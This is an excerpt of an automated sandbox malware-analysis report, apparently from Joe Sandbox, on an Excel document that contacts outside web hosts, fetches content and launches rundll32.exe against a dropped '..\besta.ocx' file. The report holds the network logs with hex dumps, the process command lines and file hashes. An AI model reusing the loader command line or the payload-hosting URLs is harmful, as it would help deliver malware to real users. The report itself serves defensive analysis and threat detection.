                                                                                                                            2021-12-02 10:35:22 UTC | 0 | OUT | GET /2/MWpqeVgZ/ HTTP/1.1
                                                                                                                            Accept: */*
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Host: standoutglobal.com
                                                                                                                            2021-12-02 10:35:24 UTC | 0 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Date: Thu, 02 Dec 2021 10:35:21 GMT
                                                                                                                            Server: Apache
                                                                                                                            Vary: Accept-Encoding,Cookie
                                                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                            Link: <https://standoutglobal.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                            Upgrade: h2,h2c
                                                                                                                            Connection: Upgrade, close
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Content-Type: text/html; charset=UTF-8


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                            1 | 192.168.2.3 | 49747 | 107.180.46.229 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                                                                            2021-12-02 10:35:25 UTC | 8 | OUT | GET / HTTP/1.1
                                                                                                                            Accept: */*
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Host: vendes.marketing
                                                                                                                            2021-12-02 10:35:26 UTC | 8 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Thu, 02 Dec 2021 10:35:25 GMT
                                                                                                                            Server: Apache
                                                                                                                            X-Powered-By: PHP/7.3.30
                                                                                                                            Link: <https://vendes.marketing/wp-json/>; rel="https://api.w.org/", <https://vendes.marketing/wp-json/wp/v2/pages/1522>; rel="alternate"; type="application/json", <https://vendes.marketing/>; rel=shortlink
                                                                                                                            Set-Cookie: htmove_has_count-1522=htmovealreadycount; path=/
                                                                                                                            Upgrade: h2,h2c
                                                                                                                            Connection: Upgrade, close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Data Ascii: widget-wrap elementor-element-populated"><div class="elementor-element elementor-element-0a81168 elementor-widget elementor-widget-html" data-id="0a81168" data-element_type="widget" id="center" data-widget_type="html.default"><div class="ele
                                                                                                                            2021-12-02 10:35:27 UTC115INData Raw: 0d 0a
                                                                                                                            Data Ascii:
                                                                                                                            2021-12-02 10:35:27 UTC115INData Raw: 34 30 30 30 0d 0a 62 70 61 6e 65 6c 22 20 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 74 61 62 2d 74 69 74 6c 65 2d 37 35 33 31 22 3e 3c 70 3e 54 65 6e 65 6d 6f 73 20 70 6c 61 6e 65 73 20 64 65 73 64 65 20 3c 73 74 72 6f 6e 67 3e 24 39 39 55 53 44 3c 2f 73 74 72 6f 6e 67 3e 20 70 61 72 61 20 67 65 6e 65 72 61 72 20 63 6f 6e 74 65 6e 69 64 6f 20 65 6e 20 72 65 64 65 73 20 73 6f 63 69 61 6c 65 73 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 74 79 70 65 22
                                                                                                                            Data Ascii: 4000bpanel" aria-labelledby="elementor-tab-title-7531"><p>Tenemos planes desde <strong>$99USD</strong> para generar contenido en redes sociales.</p></div></div><script type="application/ld+json">{"@context":"https:\/\/schema.org","@type"
                                                                                                                            2021-12-02 10:35:27 UTC123INData Raw: 6e 22 20 64 61 74 61 2d 69 64 3d 22 61 30 64 30 35 36 65 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 5f 74 79 70 65 3d 22 77 69 64 67 65 74 22 20 64 61 74 61 2d 77 69 64 67 65 74 5f 74 79 70 65 3d 22 62 75 74 74 6f 6e 2e 64 65 66 61 75 6c 74 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 22 3e 0a 09 09 09 3c 61 20 68 72 65 66 3d 22 23 70 6c 61 6e 65 73 2d 79 2d 70 72 65 63 69 6f 73 22 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 2d 6c 69 6e 6b 20 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 20 65 6c 65 6d 65 6e
                                                                                                                            Data Ascii: n" data-id="a0d056e" data-element_type="widget" data-widget_type="button.default"><div class="elementor-widget-container"><div class="elementor-button-wrapper"><a href="#planes-y-precios" class="elementor-button-link elementor-button elemen
                                                                                                                            2021-12-02 10:35:27 UTC131INData Raw: 0d 0a
                                                                                                                            Data Ascii:
                                                                                                                            2021-12-02 10:35:27 UTC131INData Raw: 34 30 30 30 0d 0a 72 2d 74 61 62 2d 63 6f 6e 74 65 6e 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 63 6c 65 61 72 66 69 78 22 20 64 61 74 61 2d 74 61 62 3d 22 31 22 20 72 6f 6c 65 3d 22 74 61 62 70 61 6e 65 6c 22 20 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 74 61 62 2d 74 69 74 6c 65 2d 32 33 32 31 22 3e 3c 70 3e 41 70 6f 72 74 61 20 65 6c 20 6d 61 79 6f 72 20 61 6c 63 61 6e 63 65 20 61 20 74 75 73 20 67 72 61 6e 64 65 73 20 70 72 6f 79 65 63 74 6f 73 20 65 6e 20 6c 61 20 77 65 62 2e 20 3c 61 20 68 72 65 66 3d 22 23 66 6f 72 6d 22 3e 53 6f 6c 69 63 69 74 61 20 75 6e 61 20 61 73 65 73 6f 72 c3 ad 61 3c 2f 61 3e 3c 2f 70 3e 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 73 63 72 69 70 74
                                                                                                                            Data Ascii: 4000r-tab-content elementor-clearfix" data-tab="1" role="tabpanel" aria-labelledby="elementor-tab-title-2321"><p>Aporta el mayor alcance a tus grandes proyectos en la web. <a href="#form">Solicita una asesora</a></p></div></div><script
                                                                                                                            2021-12-02 10:35:27 UTC139INData Raw: 0a 09 09 09 09 09 09 09 09 09 3c 2f 6c 69 3e 0a 09 09 09 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 6c 69 73 74 2d 69 74 65 6d 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 76 65 6e 64 65 73 2e 6d 61 72 6b 65 74 69 6e 67 2f 61 67 65 6e 63 69 61 2d 64 65 2d 6d 61 72 6b 65 74 69 6e 67 2d 64 69 67 69 74 61 6c 2f 65 2d 63 6f 6d 6d 65 72 63 65 2d 65 66 65 63 74 69 76 6f 2f 74 69 65 6e 64 61 2d 6f 6e 6c 69 6e 65 2d 63 6f 6e 2d 6d 61 67 65 6e 74 6f 2f 22 3e 0a 0a 09 09 09 09 09 09 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 6c 69 73 74 2d 69 63 6f 6e 22 3e 0a 09 09 09 09 09 09 09 3c 69 20 61 72 69 61 2d 68 69
                                                                                                                            Data Ascii: </li><li class="elementor-icon-list-item"><a href="https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/tienda-online-con-magento/"><span class="elementor-icon-list-icon"><i aria-hi
                                                                                                                            2021-12-02 10:35:27 UTC147INData Raw: 0d 0a
                                                                                                                            Data Ascii:
                                                                                                                            2021-12-02 10:35:27 UTC147INData Raw: 33 62 34 35 0d 0a 61 74 65 64 22 3e 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 63 38 35 62 39 38 65 20 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 73 70 61 63 65 72 22 20 64 61 74 61 2d 69 64 3d 22 63 38 35 62 39 38 65 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 5f 74 79 70 65 3d 22 77 69 64 67 65 74 22 20 64 61 74 61 2d 77 69 64 67 65 74 5f 74 79 70 65 3d 22 73 70 61 63 65 72 2e 64 65 66 61 75 6c 74 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63
                                                                                                                            Data Ascii: 3b45ated"><div class="elementor-element elementor-element-c85b98e elementor-widget elementor-widget-spacer" data-id="c85b98e" data-element_type="widget" data-widget_type="spacer.default"><div class="elementor-widget-container"><div c
                                                                                                                            2021-12-02 10:35:27 UTC155INData Raw: 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6c 2d 31 30 30 20 65 6c 65 6d 65 6e 74 6f 72 2d 74 6f 70 2d 63 6f 6c 75 6d 6e 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 63 36 36 65 37 32 63 22 20 64 61 74 61 2d 69 64 3d 22 63 36 36 65 37 32 63 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 5f 74 79 70 65 3d 22 63 6f 6c 75 6d 6e 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 77 72 61 70 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 70 6f 70 75 6c 61 74 65 64 22 3e 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 62 38
                                                                                                                            Data Ascii: elementor-col-100 elementor-top-column elementor-element elementor-element-c66e72c" data-id="c66e72c" data-element_type="column"><div class="elementor-widget-wrap elementor-element-populated"><div class="elementor-element elementor-element-b8
                                                                                                                            2021-12-02 10:35:27 UTC162INData Raw: 0d 0a
                                                                                                                            Data Ascii:
                                                                                                                            2021-12-02 10:35:27 UTC162INData Raw: 32 61 38 32 0d 0a 09 09 3c 64 69 76 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 74 79 70 65 3d 22 66 6f 6f 74 65 72 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 69 64 3d 22 32 31 35 37 22 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 20 65 6c 65 6d 65 6e 74 6f 72 2d 32 31 35 37 20 65 6c 65 6d 65 6e 74 6f 72 2d 6c 6f 63 61 74 69 6f 6e 2d 66 6f 6f 74 65 72 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 74 74 69 6e 67 73 3d 22 5b 5d 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 63 74 69 6f 6e 2d 77 72 61 70 22 3e 0a 09 09 09 09 09 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 63 74 69 6f 6e 20 65 6c 65 6d 65 6e 74 6f 72 2d 74 6f 70 2d 73 65 63 74 69 6f 6e
                                                                                                                            Data Ascii: 2a82<div data-elementor-type="footer" data-elementor-id="2157" class="elementor elementor-2157 elementor-location-footer" data-elementor-settings="[]"><div class="elementor-section-wrap"><section class="elementor-section elementor-top-section
                                                                                                                            2021-12-02 10:35:27 UTC170INData Raw: 64 61 74 61 2d 65 6c 65 6d 65 6e 74 5f 74 79 70 65 3d 22 63 6f 6c 75 6d 6e 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 77 72 61 70 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 70 6f 70 75 6c 61 74 65 64 22 3e 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 34 37 30 62 32 30 34 31 20 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 6d 65 6e 75 2d 61 6e 63 68 6f 72 22 20 64 61 74 61 2d 69 64 3d 22 34 37 30 62 32 30 34 31 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 5f 74 79 70 65 3d 22 77 69 64 67 65 74 22 20 64 61
                                                                                                                            Data Ascii: data-element_type="column"><div class="elementor-widget-wrap elementor-element-populated"><div class="elementor-element elementor-element-470b2041 elementor-widget elementor-widget-menu-anchor" data-id="470b2041" data-element_type="widget" da
                                                                                                                            2021-12-02 10:35:27 UTC172INData Raw: 0d 0a
                                                                                                                            Data Ascii:
                                                                                                                            2021-12-02 10:35:27 UTC172INData Raw: 31 64 38 33 0d 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 68 74 6d 6f 76 65 2d 71 75 69 63 6b 2d 76 69 65 77 2d 6d 6f 64 61 6c 22 20 69 64 3d 22 68 74 6d 6f 76 65 71 75 69 63 6b 2d 76 69 65 77 6d 6f 64 61 6c 22 20 73 74 79 6c 65 3d 22 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 6f 70 61 63 69 74 79 3a 20 30 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 74 6d 6f 76 65 2d 6d 6f 64 61 6c 2d 64 69 61 6c 6f 67 20 70 72 6f 64 75 63 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 74 6d 6f 76 65 2d 6d 6f 64 61 6c 2d 63 6f 6e 74 65 6e 74 22 3e 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 68 74 6d 6f 76 65 2d 6d 6f 64 61 6c 2d 63 6c 6f
                                                                                                                            Data Ascii: 1d83<div class="woocommerce htmove-quick-view-modal" id="htmovequick-viewmodal" style="visibility: hidden;opacity: 0;display:none;"><div class="htmove-modal-dialog product"><div class="htmove-modal-content"><button type="button" class="htmove-modal-clo


                                                                                                                            Code Manipulations

                                                                                                                            Statistics

                                                                                                                            CPU Usage


                                                                                                                            Memory Usage


                                                                                                                            High Level Behavior Distribution


                                                                                                                            Behavior


                                                                                                                            System Behavior

                                                                                                                            General

                                                                                                                            Start time:11:35:15
                                                                                                                            Start date:02/12/2021
                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                            Imagebase:0xce0000
                                                                                                                            File size:27110184 bytes
                                                                                                                            MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high

                                                                                                                            General

                                                                                                                            Start time:11:35:28
                                                                                                                            Start date:02/12/2021
                                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4828778935
                                                                                                                            Imagebase:0x1100000
                                                                                                                            File size:61952 bytes
                                                                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high

                                                                                                                            General

                                                                                                                            Start time:11:36:15
                                                                                                                            Start date:02/12/2021
                                                                                                                            Path:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                            Imagebase:0x7ff62a980000
                                                                                                                            File size:36864 bytes
                                                                                                                            MD5 hash:02BA81746B929ECC9DB6665589B68335
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:moderate

                                                                                                                            Disassembly

                                                                                                                            Code Analysis


                                                                                                                              Executed Functions

                                                                                                                              Non-executed Functions

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000003.420451635.000000000F62C000.00000004.00000001.sdmp, Offset: 0F62C000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_3_f62c000_EXCEL.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4cec3372f9babab121481903b18651a986cc9b7a17ce8c0ec5ad59b4d068dc3d
                                                                                                                              • Instruction ID: a56100861d6246226d471037186b118dfcaec643efb34d2f8901d0444d5e7ef3
                                                                                                                              • Opcode Fuzzy Hash: 4cec3372f9babab121481903b18651a986cc9b7a17ce8c0ec5ad59b4d068dc3d
                                                                                                                              • Instruction Fuzzy Hash: 2151AC2694E7C54FD3078BB488257847FB4AF17644F1E82EBC485CF1B3E2694A0AC766
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%